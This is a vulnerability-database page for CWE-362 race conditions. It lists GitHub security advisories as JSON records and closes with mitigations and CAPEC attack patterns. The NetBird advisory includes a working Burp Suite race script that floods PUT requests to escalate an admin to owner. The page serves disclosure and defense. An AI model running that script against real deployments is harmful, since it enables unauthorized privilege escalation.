CWE-362
Allowed-with-ReviewConcurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Abstraction: Class · Status: Draft
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.
2900 vulnerabilities reference this CWE, most recent first.
GHSA-RW8F-7P48-8M3H
Vulnerability from github – Published: 2022-09-08 00:00 – Updated: 2022-09-14 00:00A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.
{
"affected": [],
"aliases": [
"CVE-2022-31251"
],
"database_specific": {
"cwe_ids": [
"CWE-276",
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-07T09:15:00Z",
"severity": "HIGH"
},
"details": "A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.",
"id": "GHSA-rw8f-7p48-8m3h",
"modified": "2022-09-14T00:00:41Z",
"published": "2022-09-08T00:00:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31251"
},
{
"type": "WEB",
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1201674"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RW9R-WQX2-72F7
Vulnerability from github – Published: 2024-06-25 15:31 – Updated: 2025-09-17 18:31In the Linux kernel, the following vulnerability has been resolved:
bonding: fix oops during rmmod
"rmmod bonding" causes an oops ever since commit cc317ea3d927 ("bonding: remove redundant NULL check in debugfs function"). Here are the relevant functions being called:
bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root); bonding_debug_root = NULL; <--------- SET TO NULL HERE bond_netlink_fini() rtnl_link_unregister() __rtnl_link_unregister() unregister_netdevice_many_notify() bond_uninit() bond_debug_unregister() (commit removed check for bonding_debug_root == NULL) debugfs_remove() simple_recursive_removal() down_write() -> OOPS
However, reverting the bad commit does not solve the problem completely because the original code contains a race that could cause the same oops, although it was much less likely to be triggered unintentionally:
CPU1 rmmod bonding bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root);
CPU2 echo -bond0 > /sys/class/net/bonding_masters bond_uninit() bond_debug_unregister() if (!bonding_debug_root)
CPU1 bonding_debug_root = NULL;
So do NOT revert the bad commit (since the removed checks were racy anyway), and instead change the order of actions taken during module removal. The same oops can also happen if there is an error during module init, so apply the same fix there.
{
"affected": [],
"aliases": [
"CVE-2024-39296"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-25T15:15:14Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: fix oops during rmmod\n\n\"rmmod bonding\" causes an oops ever since commit cc317ea3d927 (\"bonding:\nremove redundant NULL check in debugfs function\"). Here are the relevant\nfunctions being called:\n\nbonding_exit()\n bond_destroy_debugfs()\n debugfs_remove_recursive(bonding_debug_root);\n bonding_debug_root = NULL; \u003c--------- SET TO NULL HERE\n bond_netlink_fini()\n rtnl_link_unregister()\n __rtnl_link_unregister()\n unregister_netdevice_many_notify()\n bond_uninit()\n bond_debug_unregister()\n (commit removed check for bonding_debug_root == NULL)\n debugfs_remove()\n simple_recursive_removal()\n down_write() -\u003e OOPS\n\nHowever, reverting the bad commit does not solve the problem completely\nbecause the original code contains a race that could cause the same\noops, although it was much less likely to be triggered unintentionally:\n\nCPU1\n rmmod bonding\n bonding_exit()\n bond_destroy_debugfs()\n debugfs_remove_recursive(bonding_debug_root);\n\nCPU2\n echo -bond0 \u003e /sys/class/net/bonding_masters\n bond_uninit()\n bond_debug_unregister()\n if (!bonding_debug_root)\n\nCPU1\n bonding_debug_root = NULL;\n\nSo do NOT revert the bad commit (since the removed checks were racy\nanyway), and instead change the order of actions taken during module\nremoval. The same oops can also happen if there is an error during\nmodule init, so apply the same fix there.",
"id": "GHSA-rw9r-wqx2-72f7",
"modified": "2025-09-17T18:31:15Z",
"published": "2024-06-25T15:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39296"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a45835a0bb6ef7d5ddbc0714dd760de979cb6ece"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/cf48aee81103ca06d09d73d33fb72f1191069aa6"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/f07224c16678a8af54ddc059b3d2d51885d7f35e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RWCH-4JCH-MJX7
Vulnerability from github – Published: 2022-05-14 02:44 – Updated: 2022-05-14 02:44transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
{
"affected": [],
"aliases": [
"CVE-2010-2024"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-06-07T17:12:00Z",
"severity": "MODERATE"
},
"details": "transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.",
"id": "GHSA-rwch-4jch-mjx7",
"modified": "2022-05-14T02:44:33Z",
"published": "2022-05-14T02:44:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2024"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=600097"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/59042"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-06/0079.html"
},
{
"type": "WEB",
"url": "http://bugs.exim.org/show_bug.cgi?id=989"
},
{
"type": "WEB",
"url": "http://lists.exim.org/lurker/message/20100524.175925.9a69f755.en.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042587.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042613.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/40019"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/40123"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/43243"
},
{
"type": "WEB",
"url": "http://vcs.exim.org/viewvc/exim/exim-doc/doc-txt/ChangeLog?view=markup\u0026pathrev=exim-4_72_RC2"
},
{
"type": "WEB",
"url": "http://vcs.exim.org/viewvc/exim/exim-src/src/transports/appendfile.c?r1=1.25\u0026r2=1.26"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/511653/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/40454"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-1060-1"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/1402"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0364"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RWCR-RPCC-3G9M
Vulnerability from github – Published: 2026-03-26 18:23 – Updated: 2026-03-27 21:49Impact
This vulnerability results in Cross-User Data Leakage or Information Disclosure due to a race condition in the worker protocol.
The lack of request-response correlation creates a "stale response" vulnerability. Because the worker does not verify which request a response belongs to, it may return the next available data in the buffer to an unrelated caller.
In high-throughput environments where the library processes sensitive user data (e.g., PII, authentication tokens, or private records), a timeout or high concurrent load can cause Data A (belonging to User A) to be returned to User B.
This may lead to unauthorized information disclosure that is difficult to trace, as the application may not throw an error but instead provide "valid-looking" yet entirely incorrect and private data to the wrong session.
Patches
fixed in v3.1.4
Resources
https://github.com/revelrylabs/elixir-nodejs/issues/100
https://github.com/revelrylabs/elixir-nodejs/pull/105
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "nodejs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33872"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:23:01Z",
"nvd_published_at": "2026-03-27T20:16:34Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThis vulnerability results in Cross-User Data Leakage or Information Disclosure due to a race condition in the worker protocol.\n\nThe lack of request-response correlation creates a \"stale response\" vulnerability. Because the worker does not verify which request a response belongs to, it may return the next available data in the buffer to an unrelated caller.\n\nIn high-throughput environments where the library processes sensitive user data (e.g., PII, authentication tokens, or private records), a timeout or high concurrent load can cause Data A (belonging to User A) to be returned to User B.\n\nThis may lead to unauthorized information disclosure that is difficult to trace, as the application may not throw an error but instead provide \"valid-looking\" yet entirely incorrect and private data to the wrong session.\n\n### Patches\n\nfixed in v3.1.4\n\n### Resources\nhttps://github.com/revelrylabs/elixir-nodejs/issues/100\n\nhttps://github.com/revelrylabs/elixir-nodejs/pull/105",
"id": "GHSA-rwcr-rpcc-3g9m",
"modified": "2026-03-27T21:49:01Z",
"published": "2026-03-26T18:23:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/revelrylabs/elixir-nodejs/security/advisories/GHSA-rwcr-rpcc-3g9m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33872"
},
{
"type": "WEB",
"url": "https://github.com/revelrylabs/elixir-nodejs/issues/100"
},
{
"type": "WEB",
"url": "https://github.com/revelrylabs/elixir-nodejs/pull/105"
},
{
"type": "PACKAGE",
"url": "https://github.com/revelrylabs/elixir-nodejs"
},
{
"type": "WEB",
"url": "https://github.com/revelrylabs/elixir-nodejs/releases/tag/v3.1.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "elixir-nodejs has Cross-User Data Leakage or Information Disclosure due to Worker Protocol Race Condition"
}
GHSA-RX4W-HX56-763J
Vulnerability from github – Published: 2022-05-13 01:24 – Updated: 2022-05-13 01:24Race condition in the console implementation in Google Chrome before 6.0.472.59 has unspecified impact and attack vectors.
{
"affected": [],
"aliases": [
"CVE-2010-3412"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-09-16T21:00:00Z",
"severity": "HIGH"
},
"details": "Race condition in the console implementation in Google Chrome before 6.0.472.59 has unspecified impact and attack vectors.",
"id": "GHSA-rx4w-hx56-763j",
"modified": "2022-05-13T01:24:50Z",
"published": "2022-05-13T01:24:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3412"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7354"
},
{
"type": "WEB",
"url": "http://code.google.com/p/chromium/issues/detail?id=51919"
},
{
"type": "WEB",
"url": "http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RX5X-FC3W-5FC6
Vulnerability from github – Published: 2026-01-13 18:31 – Updated: 2026-01-13 18:31Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2026-20867"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-13T18:16:16Z",
"severity": "HIGH"
},
"details": "Concurrent execution using shared resource with improper synchronization (\u0027race condition\u0027) in Windows Management Services allows an authorized attacker to elevate privileges locally.",
"id": "GHSA-rx5x-fc3w-5fc6",
"modified": "2026-01-13T18:31:09Z",
"published": "2026-01-13T18:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20867"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20867"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RXMP-8H9V-56CX
Vulnerability from github – Published: 2026-04-01 21:03 – Updated: 2026-04-01 21:03Summary
A race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.
Details
The vulnerability exists in the updateUser function, which is connected to the /users/{userId} PUT request. This function then calls the SaveOrAddUsers function, which checks the user's permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called initiatorUser.
SaveOrAddUsers Function
Location: netbird/management/server/user.go — Line 556
Afterwards, the validateUserUpdate function is called, which checks if the initiator has permission to update that specific user's role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.
validateUserUpdate Function
Location: netbird/management/server/user.go — Line 862
In summary, if the initiator's permission is admin at the first check and gets dropped to user at the second check, the initiator can update a user to owner.
Proof of Concept
It is possible to create the following attack:
The initiator (old_admin) creates two different accounts — one with a user role and another with an admin role. These will be referred to as new_user and new_admin from here on.
Two different requests are needed:
- Request 1 — Using
new_admin's JWT, a request is created that changesold_admin's role to user. - Request 2 — Using
old_admin's JWT, a request is created that changesnew_user's role to owner.
Both requests need valid user IDs and auto_groups group IDs. They should be sent simultaneously without waiting for prior requests to return.
There is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using 5 copies of Request 1 and 100 copies of Request 2 without waiting for any request to complete. The request that updated the role to owner returned 500 status codes instead of 403, which when retried returned 200 and successfully applied the update.
The following Burp Suite race condition script was used. Note that it may still require multiple tries, and the old_admin account role must be reset to admin after every failed attempt.
import time
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=100,
requestsPerConnection=100,
pipeline=False
)
# Request 1
req1 = """PUT /api/users/{OLD_ADMIN_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {NEW_ADMIN_TOKEN}
Content-Length: 73
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"role":"user","auto_groups":[GROUP_ID],"is_blocked":false}"""
# Request 2
req2 = """PUT /api/users/{NEW_USER_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {OLD_ADMIN_TOKEN}
Content-Length: 52
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"role":"owner","auto_groups":[],"is_blocked":false}"""
# Send first request
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
# Send second request
for i in range(100):
engine.queue(req2)
def handleResponse(req, interesting):
table.add(req)
Impact
An attacker with an admin account on the self-hosted NetBird management application v0.65.2 or lower can escalate to owner privileges.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.65.2"
},
"package": {
"ecosystem": "Go",
"name": "github.com/netbirdio/netbird"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.65.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:03:00Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nA race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.\n\n## Details\n\nThe vulnerability exists in the `updateUser` function, which is connected to the `/users/{userId}` PUT request. This function then calls the `SaveOrAddUsers` function, which checks the user\u0027s permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called `initiatorUser`.\n\n### `SaveOrAddUsers` Function\n\n**Location:** `netbird/management/server/user.go` \u2014 Line 556\n\n\n\nAfterwards, the `validateUserUpdate` function is called, which checks if the initiator has permission to update that specific user\u0027s role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.\n\n### `validateUserUpdate` Function\n\n**Location:** `netbird/management/server/user.go` \u2014 Line 862\n\n\n\nIn summary, if the initiator\u0027s permission is **admin** at the first check and gets dropped to **user** at the second check, the initiator can update a user to **owner**.\n\n## Proof of Concept\n\nIt is possible to create the following attack:\n\nThe initiator (`old_admin`) creates two different accounts \u2014 one with a **user** role and another with an **admin** role. These will be referred to as `new_user` and `new_admin` from here on.\n\nTwo different requests are needed:\n\n1. **Request 1** \u2014 Using `new_admin`\u0027s JWT, a request is created that changes `old_admin`\u0027s role to **user**.\n2. **Request 2** \u2014 Using `old_admin`\u0027s JWT, a request is created that changes `new_user`\u0027s role to **owner**.\n\nBoth requests need valid user IDs and `auto_groups` group IDs. They should be sent simultaneously without waiting for prior requests to return.\n\nThere is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using **5 copies of Request 1** and **100 copies of Request 2** without waiting for any request to complete. The request that updated the role to owner returned **500** status codes instead of **403**, which when retried returned **200** and successfully applied the update.\n\nThe following Burp Suite race condition script was used. Note that it may still require multiple tries, and the `old_admin` account role must be reset to **admin** after every failed attempt.\n\n```python\nimport time\n\ndef queueRequests(target, wordlists):\n\n engine = RequestEngine(\n endpoint=target.endpoint,\n concurrentConnections=100,\n requestsPerConnection=100,\n pipeline=False\n )\n\n # Request 1\n req1 = \"\"\"PUT /api/users/{OLD_ADMIN_USERID} HTTP/2\nHost: CHANGE_WITH_HOST\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0\nAccept: application/json\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/json\nAuthorization: Bearer {NEW_ADMIN_TOKEN}\nContent-Length: 73\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\n\n{\"role\":\"user\",\"auto_groups\":[GROUP_ID],\"is_blocked\":false}\"\"\"\n\n # Request 2\n req2 = \"\"\"PUT /api/users/{NEW_USER_USERID} HTTP/2\nHost: CHANGE_WITH_HOST\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0\nAccept: application/json\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/json\nAuthorization: Bearer {OLD_ADMIN_TOKEN}\nContent-Length: 52\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\n\n{\"role\":\"owner\",\"auto_groups\":[],\"is_blocked\":false}\"\"\"\n\n # Send first request\n engine.queue(req1)\n engine.queue(req1)\n engine.queue(req1)\n engine.queue(req1)\n engine.queue(req1)\n\n # Send second request\n for i in range(100):\n engine.queue(req2)\n\n\ndef handleResponse(req, interesting):\n table.add(req)\n```\n\n## Impact\n\nAn attacker with an admin account on the self-hosted NetBird management application **v0.65.2 or lower** can escalate to owner privileges.",
"id": "GHSA-rxmp-8h9v-56cx",
"modified": "2026-04-01T21:03:00Z",
"published": "2026-04-01T21:03:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netbirdio/netbird/security/advisories/GHSA-rxmp-8h9v-56cx"
},
{
"type": "PACKAGE",
"url": "https://github.com/netbirdio/netbird"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "NetBird has Race Condition on UpdateUser Function, Resulting in Privilege Escalation From Admin to Owner"
}
GHSA-RXPR-5X8P-2XF5
Vulnerability from github – Published: 2023-05-10 00:30 – Updated: 2024-04-04 03:58An improper authentication vulnerability exists in Avalanche Premise versions 6.3.x and below that could allow an attacker to gain access to the server by registering to receive messages from the server and perform an authentication bypass.
{
"affected": [],
"aliases": [
"CVE-2023-28125"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-09T22:15:09Z",
"severity": "MODERATE"
},
"details": "An improper authentication vulnerability exists in Avalanche Premise versions 6.3.x and below that could allow an attacker to gain access to the server by registering to receive messages from the server and perform an authentication bypass.",
"id": "GHSA-rxpr-5x8p-2xf5",
"modified": "2024-04-04T03:58:07Z",
"published": "2023-05-10T00:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28125"
},
{
"type": "WEB",
"url": "https://forums.ivanti.com/s/article/ZDI-CAN-17729-CVE-2023-28125-Bug-958437-ZDI-CAN-17729-Ivanti-Avalanche-InfoRail-Authentication-Bypass-Vulnerability?language=en_US"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RXWR-WPPX-RXCC
Vulnerability from github – Published: 2022-05-14 02:10 – Updated: 2022-05-14 02:10Race condition in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the plug-in paint buffer.
{
"affected": [],
"aliases": [
"CVE-2012-2880"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-09-26T10:56:00Z",
"severity": "HIGH"
},
"details": "Race condition in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the plug-in paint buffer.",
"id": "GHSA-rxwr-wppx-rxcc",
"modified": "2022-05-14T02:10:46Z",
"published": "2022-05-14T02:10:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2880"
},
{
"type": "WEB",
"url": "https://code.google.com/p/chromium/issues/detail?id=139462"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78838"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15776"
},
{
"type": "WEB",
"url": "http://googlechromereleases.blogspot.com/2012/09/stable-channel-update_25.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00012.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-V242-2PG6-CFQQ
Vulnerability from github – Published: 2025-11-10 21:30 – Updated: 2025-11-10 21:30Race in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
{
"affected": [],
"aliases": [
"CVE-2025-12432"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-10T20:15:37Z",
"severity": "HIGH"
},
"details": "Race in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
"id": "GHSA-v242-2pg6-cfqq",
"modified": "2025-11-10T21:30:35Z",
"published": "2025-11-10T21:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12432"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop_28.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/439522866"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance.
Mitigation
Use thread-safe capabilities such as the data access abstraction in Spring.
Mitigation
- Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.
- Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400).
Mitigation
When using multithreading and operating on shared variables, only use thread-safe functions.
Mitigation
Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write.
Mitigation
Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412.
Mitigation
Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization.
Mitigation
Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop.
Mitigation
Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
CAPEC-26: Leveraging Race Conditions
The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.
CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.